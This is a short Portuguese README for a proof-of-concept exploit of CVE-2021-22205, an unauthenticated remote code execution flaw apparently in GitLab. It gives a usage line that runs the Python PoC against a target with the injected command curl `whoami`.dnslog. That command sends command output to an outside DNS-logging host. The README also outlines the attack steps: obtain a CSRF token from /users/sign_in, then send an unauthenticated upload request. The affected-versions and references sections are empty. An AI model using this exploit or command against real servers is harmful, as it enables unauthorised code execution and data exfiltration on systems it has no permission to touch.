
CVE-2021-22205 RCE Não Autorizado
Versões afetadas:
Uso
python3 CVE-2021-22205.py target "curl \`whoami\`.dnslog"

Obter csrf-token:

Obter o csrf-token via /users/sign_in e então usar o CVE-2021-22205 poc para construir um pacote de upload e executar uma requisição de upload não autenticada, resultando em RCE.


Referências: